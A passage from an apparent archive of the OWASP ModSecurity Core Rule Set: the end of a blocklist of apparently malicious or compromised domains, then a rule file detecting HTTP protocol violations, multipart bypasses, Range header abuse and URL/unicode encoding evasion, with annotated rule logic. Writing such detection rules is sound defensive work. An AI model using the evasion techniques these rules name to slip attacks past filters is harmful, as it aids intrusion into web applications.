www.vasilevi.com/ www.vasterviksdjurklinik.se/ www.vaue160.org/ www.vemk.artn.ru/ www.vendo-sito.com/ www.versandbar.de/ www.vid-proekt.ru/ www.vietnamngaymai.org/ www.vif2.ru/ www.vijayawadakanakadurga.com/ www.vinci.co.il/ www.viparenda.ru/ www.virtualhost.com.mx/ www.visibuzz.com/ www.vitalina.pit.lv/ www.vmtfr.com/ www.vorster.net/ www.votaya.com/ www.votemydog.com/ www.voyageclub.ru/ www.vueltacarnero.com/ www.vust.net/ www.vuurwerkessen.be/ www.vvrp.com/ www.vwgolf-club.ru/ www.vwo-campus.net/ www.w5-online.de/ www.waawaa.com/ www.walji-co.com/ www.walkersgameear.com/ www.walkingdoll.co.kr/ www.warisan.gov.my/ www.wat-is.info/ www.wattenhofer.com/ www.waxzone.net/ www.wdiet.co.kr/ www.webdeoro.com/ www.webfo.biz/ www.webgrrls.com/ www.websicherheit.net/ www.webviews.co.uk/ www.welcometoreason.com/ www.wemonmobila.info/ www.wentina.hellospace.net/ www.westsite.org.ru/ www.wetlaufer.com/ www.wfc.edu.tw/ www.wg.com.pl/ www.whoartthou.com.au/ wwww.iafie.org/ www.wicasta.com/ www.winewise.de/ www.wizard.com.br/ www.wolfems.com/ www.womabkr.com.tw/ www.women2day.com/ www.wonie.net/ www.woodwork999.com/ www.wpsistemas.com.br/ www.wsfiz.siedlce.pl/ www.wstardesigns.com/ www.wuweizhou.com/ www.www.dewa.yourfreehosting.net/ www.wycom.co.kr/ www.x4team.com/ www.xedu.kit.net/ www.xfocus.net/ www.xgamex.org/ www.x-pronet.com/ www.xxparceroxx.xpg.com.br/ www.yaco-online.com.br/ www.yak.com.pl/ www.yamagiku.net/ www.yaponamoto.ru/ www.yat.ch/ www.yazd.agri-jahad.ir/ www.ybkor.com/ www.ybrt.cn/ www.ydcommunity.com/ www.yeni.org/ www.yeojuspa.co.kr/ www.yes-tech.co.kr/ www.yihshen.com.tw/ www.ymti.org/ www.yokomagazine.com/ www.yorkza.com/ www.youclinic.com/ www.yourportalonline.com/ www.your-server-with.id-link.goes.here.com/ www.youthsoroca.md/ www.ypm-lpmb.com/ www.yw365.com/ www.ywms.net/ www.zachaem.ru/ www.zahnaerzte-thun.ch/ www.zaknack.com/ www.zenkwanum.nazwa.pl/ www.zhepb.gov.cn/ www.zoldtermekek.hu/ www.zsp6.jaworzno.edu.pl/ www.zumhexenkessel.de/ 
www.zvezda-spb.ru/ www.zymes.gr/ xaoss.com/ xat.co.kr/ xedu.kit.net/ xenguide.pe.kr/ xexelento.freehostia.com/ xlab.cn.nctu.edu.tw/ xoomer.alice.it/ xoomer.virgilio.it/ .xpg.com.br/ xscan.fileave.com/ xsnuff.yoyo.pl/ xumy.fileave.com/ xxlplan.ovh.net/ yakuza42.t35.com/ .ya.ru/ yasmin.ws/ yateveo.com.mx/ yc44.com/ yeonkok.puru.net/ yongsin.es.kr/ yourmail.fr/ yoursupplements4you.com/ youthcounselor.org/ youthwonju.com/ zacs.ca/ zarafshan.ru/ zargoon.misesajour.com/ zclub.nu/ zetan.fileave.com/ zipclube.com/ znaes.webs.com/ zonadeclientes.com/ zoulekreunion.com/ zphone.co.kr/ zsjs.nmfc.gov.cn/ zxczxc.fileave.com/ zz-dns.com/ ����������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_20_protocol_violations.conf�����0000664�0000000�0000000�00000054515�12164572564�0033440�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Some protocol violations are common in application layer attacks. # Validating HTTP requests eliminates a large number of application layer attacks. # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. 
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html
#

#
# Validate request line against the format specified in the HTTP RFC
#
# -=[ Rule Logic ]=-
#
# Uses rule negation against the regex for positive security. The regex specifies the proper
# construction of URI request lines such as:
#
#   "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
#
# It also outlines proper construction for CONNECT, OPTIONS and GET requests.
#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1
# http://capec.mitre.org/data/definitions/272.html
#
# -=[ Review Notes ]=-
# The leading "!" negates the operator: the rule fires when REQUEST_LINE does NOT
# fit the pattern. The whole pattern is case-insensitive (?i:...).
# Accepted shapes, as written in the regex:
#   - <3-10 letter method> [scheme://host[:port]]/path[?query][#fragment] <protocol token>
#   - "connect" followed by a dotted-quad address (optional trailing dot and :port)
#     and a protocol token
#   - "options *" and a protocol token
#   - a bare "get /path[?query][#fragment]" with no protocol token
# NOTE(review): the CONNECT branch accepts only numeric addresses, so a CONNECT
# request that names a host would be reported - confirm this is intended where
# CONNECT is proxied.
# The rule runs in phase:1 with t:none, logs the raw request line via logdata and
# adds tx.notice_anomaly_score (defined outside this excerpt) to tx.anomaly_score.
#
SecRule REQUEST_LINE "!^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$"\
    "msg:'Invalid HTTP Request Line',\
    severity:'4',\
    id:'960911',\
    ver:'OWASP_CRS/2.2.8',\
    rev:'2',\
    maturity:'9',\
    accuracy:'9',\
    logdata:'%{request_line}',\
    phase:1,\
    block,\
    t:none,\
    tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\
    tag:'CAPEC-272',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Identify Invalid URIs Blocked by Apache
#
# -=[ Rule Logic ]=-
#
# There are some request violations that Apache will handle internally, prior to the
# ModSecurity phase:1 POST-READ-REQUEST hook. For these requests, we can still get
# visibility by running a check in phase:5 logging to look for the Apache error msg.
#
# -=[ References ]=-
#
# -=[ Review Notes ]=-
# This rule matches on the literal text "Invalid URI in request" in
# WEBSERVER_ERROR_LOG. It runs in phase:5 with the non-disruptive "pass" action,
# so it only records the event and adds tx.notice_anomaly_score to
# tx.anomaly_score; it does not reject the request itself.
# NOTE(review): detection depends on the exact wording of the web server's error
# message - verify the string against the server version in use.
#
SecRule WEBSERVER_ERROR_LOG "@contains Invalid URI in request" \
    "msg:'Apache Error: Invalid URI in Request.', \
    severity:'4', \
    id:'981227', \
    ver:'OWASP_CRS/2.2.8', \
    rev:'1', \
    maturity:'9', \
    accuracy:'9', \
    logdata:'%{request_line}', \
    phase:5, \
    pass, \
    t:none, \
    tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \
    tag:'CAPEC-272', \
    setvar:'tx.msg=%{rule.msg}', \
    setvar:tx.anomaly_score=+%{tx.notice_anomaly_score}, \
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Identify multipart/form-data name evasion attempts
#
# There are possible impedance mismatches between how
# ModSecurity interprets multipart file names and how
# a destination app server such as PHP might parse the
# Content-Disposition data:
#
#   filename-parm := "filename" "=" value
#
# -=[ Rule Logic ]=-
# This rule checks for the presence of the ' " ; = meta-characters in
# either the FILES (file name) or FILES_NAMES (form field name) variables.
# The values are URL-decoded first (t:urlDecodeUni), so encoded forms of
# these characters are matched as well.
#
# -=[ References ]=-
# https://www.owasp.org/index.php/ModSecurity_CRS_RuleID-960000
# http://www.ietf.org/rfc/rfc2183.txt
#
# -=[ Review Notes ]=-
# The rule is rated accuracy:'7' and scores at the critical level.
# NOTE(review): an ordinary upload whose name contains an apostrophe,
# semicolon or equals sign also matches the character class - expect to
# review alerts from this rule per application before enforcing.
#
SecRule FILES_NAMES|FILES "['\";=]" \
    "msg:'Attempted multipart/form-data bypass', \
    severity:'2', \
    id:'960000', \
    ver:'OWASP_CRS/2.2.8', \
    rev:'1', \
    maturity:'9', \
    accuracy:'7', \
    logdata:'%{matched_var}', \
    phase:2, \
    block, \
    t:none,t:urlDecodeUni, \
    tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \
    tag:'CAPEC-272', \
    setvar:'tx.msg=%{rule.msg}', \
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Verify that we've correctly processed the request body.
#
# As a rule of thumb, when failing to process a request body
# you should reject the request (when deployed in blocking mode)
# or log a high-severity alert (when deployed in detection-only mode).
#
# -=[ Rule Logic ]=-
# Checks the REQBODY_ERROR variable that is set by the request body
# processor if it encounters errors. The operator is a negated "@eq 0",
# so the rule matches on any value other than 0.
#
# -=[ References ]=-
# https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#REQBODY_ERROR
#
# -=[ Review Notes ]=-
# The parser's own error text is written to the alert through
# logdata:'%{REQBODY_ERROR_MSG}'. A body that cannot be parsed cannot be
# inspected by the later phase:2 rules, which is why this rule scores at the
# critical level.
# NOTE(review): this check presumably only has an effect when request body
# processing is enabled (SecRequestBodyAccess On) - confirm in the main
# configuration.
#
SecRule REQBODY_ERROR "!@eq 0" \
    "msg:'Failed to parse request body.', \
    severity:'2', \
    id:'960912', \
    ver:'OWASP_CRS/2.2.8', \
    rev:'1', \
    maturity:'9', \
    accuracy:'9', \
    logdata:'%{REQBODY_ERROR_MSG}', \
    phase:2, \
    block, \
    t:none, \
    tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \
    tag:'CAPEC-272', \
    setvar:'tx.msg=%{rule.msg}', \
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Strict Multipart Parsing Checks
#
# -=[ Rule Logic ]=-
# By default be strict with what we accept in the multipart/form-data
# request body. If the rule below proves to be too strict for your
# environment consider changing it to detection-only. You are encouraged
# _not_ to remove it altogether.
#
# -=[ References ]=-
# https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#MULTIPART_STRICT_ERROR
#
# The alert message expands each individual multipart flag (PE, BQ, BW,
# DB, DA, HF, LF, SM, IQ, IH, FLE), so the log entry shows which of the
# strict checks was responsible for the non-zero MULTIPART_STRICT_ERROR.
#
SecRule MULTIPART_STRICT_ERROR "!@eq 0" \
  "msg:'Multipart request body failed strict validation: \
  PE %{REQBODY_PROCESSOR_ERROR}, \
  BQ %{MULTIPART_BOUNDARY_QUOTED}, \
  BW %{MULTIPART_BOUNDARY_WHITESPACE}, \
  DB %{MULTIPART_DATA_BEFORE}, \
  DA %{MULTIPART_DATA_AFTER}, \
  HF %{MULTIPART_HEADER_FOLDING}, \
  LF %{MULTIPART_LF_LINE}, \
  SM %{MULTIPART_SEMICOLON_MISSING}, \
  IQ %{MULTIPART_INVALID_QUOTING}, \
  IH %{MULTIPART_INVALID_HEADER_FOLDING}, \
  FLE %{MULTIPART_FILE_LIMIT_EXCEEDED}', \
  severity:'2', \
  id:'960914', \
  ver:'OWASP_CRS/2.2.8', \
  rev:'1', \
  maturity:'8', \
  accuracy:'7', \
  phase:2, \
  block, \
  t:none, \
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \
  tag:'CAPEC-272', \
  setvar:'tx.msg=%{rule.msg}', \
  setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \
  setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Multipart Unmatched Boundary Check
#
# -=[ Rule Logic ]=-
# Matches when the MULTIPART_UNMATCHED_BOUNDARY flag is not 0 and raises
# an alert with the critical anomaly score.
#
# -=[ References ]=-
# https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#MULTIPART_UNMATCHED_BOUNDARY
#
SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0" \
  "msg:'Multipart parser detected a possible unmatched boundary.', \
  severity:'2', \
  id:'960915', \
  ver:'OWASP_CRS/2.2.8', \
  rev:'1', \
  maturity:'8', \
  accuracy:'8', \
  phase:2, \
  block, \
  t:none, \
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \
  tag:'CAPEC-272', \
  setvar:'tx.msg=%{rule.msg}', \
  setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \
  setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'"

#
# Accept only digits in content length
#
# -=[ Rule Logic ]=-
# This rule negates the regex match: if the Content-Length header
# is NOT made up entirely of digits, the rule matches.
#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13
#
# Rule 960016 runs in phase:1 (request headers) and adds the critical
# anomaly score when the Content-Length value does not match ^\d+$.
#
SecRule REQUEST_HEADERS:Content-Length "!^\d+$" \
  "msg:'Content-Length HTTP header is not numeric.',\
  severity:'2',\
  id:'960016',\
  ver:'OWASP_CRS/2.2.8',\
  rev:'1',\
  maturity:'9',\
  accuracy:'9',\
  phase:1,\
  block,\
  logdata:'%{matched_var}',\
  t:none,\
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
  tag:'CAPEC-272',\
  setvar:'tx.msg=%{rule.msg}',\
  setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
  setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'"

#
# Do not accept GET or HEAD requests with bodies
# HTTP standard allows GET requests to have a body but this
# feature is not used in real life. Attackers could try to force
# a request body on an unsuspecting web application.
#
# -=[ Rule Logic ]=-
# This is a chained rule that first checks the Request Method. If it is a
# GET or HEAD method, then it checks the Content-Length header. If the
# header exists and its value is anything other than empty or a single 0,
# the chain matches.
# NOTE(review): the chain only looks at Content-Length; a body sent with
# chunked transfer coding carries no Content-Length and is not seen here.
# Confirm that case is handled elsewhere in your deployment.
#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.3
#
SecRule REQUEST_METHOD "^(?:GET|HEAD)$" \
  "msg:'GET or HEAD Request with Body Content.',\
  severity:'2',\
  id:'960011',\
  ver:'OWASP_CRS/2.2.8',\
  rev:'1',\
  maturity:'9',\
  accuracy:'9',\
  phase:1,\
  block,\
  logdata:'%{matched_var}',\
  t:none,\
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
  tag:'CAPEC-272',\
  chain"
  SecRule REQUEST_HEADERS:Content-Length "!^0?$"\
    "t:none,\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'"

#
# Require Content-Length to be provided with every POST request.
#
# -=[ Rule Logic ]=-
# This chained rule checks if the request method is POST; if so, it checks that a Content-Length
# header is also present.
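#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.5
#
# Rule 960012: the chained rule counts Content-Length headers
# (&REQUEST_HEADERS:Content-Length) and matches when the count is 0.
# A match adds only the notice anomaly score.
# NOTE(review): an HTTP/1.1 POST sent with chunked transfer coding has no
# Content-Length and will be scored here - confirm that is acceptable for
# the clients you serve.
#
SecRule REQUEST_METHOD "^POST$" \
  "msg:'POST request missing Content-Length Header.',\
  severity:'4',\
  id:'960012',\
  ver:'OWASP_CRS/2.2.8',\
  rev:'1',\
  maturity:'9',\
  accuracy:'9',\
  phase:1,\
  block,\
  logdata:'%{matched_var}',\
  t:none,\
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
  tag:'CAPEC-272',\
  chain"
  SecRule &REQUEST_HEADERS:Content-Length "@eq 0" \
    "t:none,\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'"

#
# Reject the identity content-coding in the Content-Encoding request header
# identity The default (identity) encoding; the use of no transformation whatsoever.
# This content-coding is used only in the Accept-Encoding header, and SHOULD NOT be
# used in the Content-Encoding header.
#
# -=[ Rule Logic ]=-
# This rule inspects the Content-Encoding request header and matches when its
# value is exactly "identity". Content-coding values are case-insensitive, so
# the pattern is matched case-insensitively ((?i)); the earlier "^Identity$"
# form only recognised that one capitalisation.
# The rule does not look at compressed codings; it covers identity only.
#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html
#
SecRule REQUEST_HEADERS:Content-Encoding "(?i)^identity$" \
  "msg:'Invalid Use of Identity Encoding.',\
  severity:'4',\
  id:'960902',\
  ver:'OWASP_CRS/2.2.8',\
  rev:'2',\
  maturity:'9',\
  accuracy:'9',\
  phase:1,\
  block,\
  logdata:'%{matched_var}',\
  t:none,\
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
  tag:'CAPEC-272',\
  setvar:'tx.msg=%{rule.msg}',\
  setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\
  setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'"

#
# Expect header is an HTTP/1.1 protocol feature
# Automated programs and bots often do not obey the HTTP RFC
#
# -=[ Rule Logic ]=-
# This chained rule looks for the Expect request header, and if it is found then it
# checks the HTTP protocol version supplied by the client. If it is version 1.0, the
# rule matches.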
#
# -=[ References ]=-
# http://www.bad-behavior.ioerror.us/documentation/how-it-works/
#
# Rule 960022: the starter matches an Expect header that contains
# "100-continue"; the chained rule then requires REQUEST_PROTOCOL to be
# exactly HTTP/1.0. A match adds the notice anomaly score.
#
SecRule REQUEST_HEADERS:Expect "@contains 100-continue" \
  "msg:'Expect Header Not Allowed for HTTP 1.0.',\
  severity:'5',\
  id:'960022',\
  ver:'OWASP_CRS/2.2.8',\
  rev:'2',\
  maturity:'7',\
  accuracy:'9',\
  phase:1,\
  block,\
  logdata:'%{matched_var}',\
  t:none,\
  tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\
  tag:'CAPEC-272',\
  chain"
  SecRule REQUEST_PROTOCOL "@streq HTTP/1.0" \
    "t:none,\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\
    setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'"

#
# Pragma Header requires a Cache-Control Header
# Automated programs and bots often do not obey the HTTP RFC
#
# -=[ Rule Logic ]=-
# This chained rule first checks for the existence of a Pragma request header. If it is found,
# then it checks for a corresponding Cache-Control header (as the HTTP 1.1 RFC states clients should submit
# one). If this is also missing, then it verifies the HTTP protocol version. If it is 1.1 then the rule
# matches.
# The first test is a header count compared with "@eq 1", so only requests
# with exactly one Pragma header enter the chain.
#
# -=[ References ]=-
# http://www.bad-behavior.ioerror.us/documentation/how-it-works/
#
SecRule &REQUEST_HEADERS:Pragma "@eq 1" "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Pragma Header requires Cache-Control Header for HTTP/1.1 requests.',severity:'5',id:'960020',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ'"
        SecRule &REQUEST_HEADERS:Cache-Control "@eq 0" "chain"
                SecRule REQUEST_PROTOCOL "@streq HTTP/1.1" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}"

#
# Range Header Checks
#
# 1. Range Header exists and begins with 0 - normal browsers don't do this.
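# Automated programs and bots often do not obey the HTTP RFC
#
# -=[ Rule Logic ]=-
# This rule inspects the Range request header to see if it starts with 0
# (the value begins with "bytes=0-").
#
# -=[ References ]=-
# http://www.bad-behavior.ioerror.us/documentation/how-it-works/
#
# 2. Per RFC 2616 -
# "If the last-byte-pos value is present, it MUST be greater than or equal to the first-byte-pos in that byte-range-spec,
# or the byte-range-spec is syntactically invalid."
# -=[ Rule Logic ]=-
# The chain starter captures a first-byte-pos/last-byte-pos pair that is followed by a
# comma into TX:1 and TX:2. The chained rule matches when TX:2 is not greater than or
# equal to TX:1, i.e. when the first value is greater than the second.
# The scoring setvar actions are placed on the last rule of the chain. Non-disruptive
# actions run as soon as the rule that carries them matches, so on the chain starter
# they would add to tx.anomaly_score for every comma-separated range, valid or not.
# NOTE(review): only a pair followed by a comma is captured, so a single range or the
# final range of a list is not compared by this rule.
#
# -=[ References ]=-
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
# http://seclists.org/fulldisclosure/2011/Aug/175
#
# 3. Identifies an excessive number of byte range fields within one request
# (the pattern requires five comma-terminated byte range fields after "bytes=").
#
SecRule REQUEST_HEADERS:Range "@beginsWith bytes=0-" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: field exists and begins with 0.',logdata:'%{matched_var}',severity:'4',id:'958291',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}"

SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "(\d+)\-(\d+)\," "chain,capture,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: Invalid Last Byte Value.',logdata:'%{matched_var}',severity:'4',id:'958230',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ'"
        SecRule TX:2 "!@ge %{tx.1}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}"

SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "^bytes=(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\," "phase:2,capture,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: Too many fields',logdata:'%{matched_var}',severity:'4',id:'958231',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}"

#
# Broken/Malicious clients often have duplicate or conflicting headers
# Automated programs and bots often do not obey the HTTP RFC
#
# -=[ Rule Logic ]=-
# This rule inspects the Connection header and looks for two comma-separated
# keep-alive/close options in a row, which covers both duplicates
# (keep-alive, keep-alive) and conflicts (keep-alive, close).
#
# -=[ References ]=-
# http://www.bad-behavior.ioerror.us/documentation/how-it-works/
#
SecRule REQUEST_HEADERS:Connection "\b(keep-alive|close),\s?(keep-alive|close)\b" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Multiple/Conflicting Connection Header Data Found.',logdata:'%{matched_var}',id:'958295',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}"

#
# Check URL encodings
#
# -=[ Rule Logic ]=-
# There are two different chained rules. We need to separate them as we are inspecting two
# different variables - REQUEST_URI and REQUEST_BODY. For REQUEST_BODY, we only want to
# run the @validateUrlEncoding operator if the content-type is application/x-www-form-urlencoded.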
#
# -=[ References ]=-
# http://www.ietf.org/rfc/rfc1738.txt
#
# Rule 950107: the starter is a pre-filter that only lets a REQUEST_URI
# containing a %-sequence continue to the @validateUrlEncoding check.
#
SecRule REQUEST_URI "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" \
        "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'URL Encoding Abuse Attack Attempt',id:'950107',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'"
        SecRule REQUEST_URI "@validateUrlEncoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

# Rule 950109 is a single rule, not a chain: an ARGS value that still
# contains a %-sequence (t:none, no further decoding by this rule) is
# reported as 'Multiple URL Encoding Detected'.
SecRule ARGS "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" \
        "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Multiple URL Encoding Detected',id:'950109',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

# Rule 950108: the body check runs only when Content-Type is
# application/x-www-form-urlencoded or text/xml (optionally followed by a
# charset parameter); the same %-sequence pre-filter and
# @validateUrlEncoding test are then applied to REQUEST_BODY and XML:/*.
SecRule REQUEST_HEADERS:Content-Type "^(application\/x-www-form-urlencoded|text\/xml)(?:;(?:\s?charset\s?=\s?[\w\d\-]{1,18})?)??$" \
        "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'URL Encoding Abuse Attack Attempt',id:'950108',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'"
        SecRule REQUEST_BODY|XML:/* "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" "chain"
                SecRule REQUEST_BODY|XML:/* "@validateUrlEncoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

#
# Check UTF encoding
# We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise
# it will result in false positives.
#
# -=[ Rule Logic ]=-
# This chained rule first checks to see if the admin has set the TX:CRS_VALIDATE_UTF8_ENCODING
# variable in the modsecurity_crs_10_config.conf file.
#
# Rule 950801: the check is opt-in. @validateUtf8Encoding is applied to
# REQUEST_FILENAME, ARGS and ARGS_NAMES only when
# TX:CRS_VALIDATE_UTF8_ENCODING equals 1.
#
SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'UTF8 Encoding Abuse Attack Attempt',id:'950801',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'"
        SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

#
# Disallow use of full-width unicode as decoding evasions may be possible.
#
# -=[ Rule Logic ]=-
# This rule looks for full-width encoding by looking for %u followed by 2 f characters
# and then 2 hex characters. It is matched with t:none, i.e. against the
# value as received, in REQUEST_URI and REQUEST_BODY.
#
# -=[ References ]=-
# http://www.kb.cert.org/vuls/id/739224
#
SecRule REQUEST_URI|REQUEST_BODY "\%u[fF]{2}[0-9a-fA-F]{2}" \
        "t:none,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',block,msg:'Unicode Full/Half Width Abuse Attack Attempt',id:'950116',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

#
# Proxy access attempt
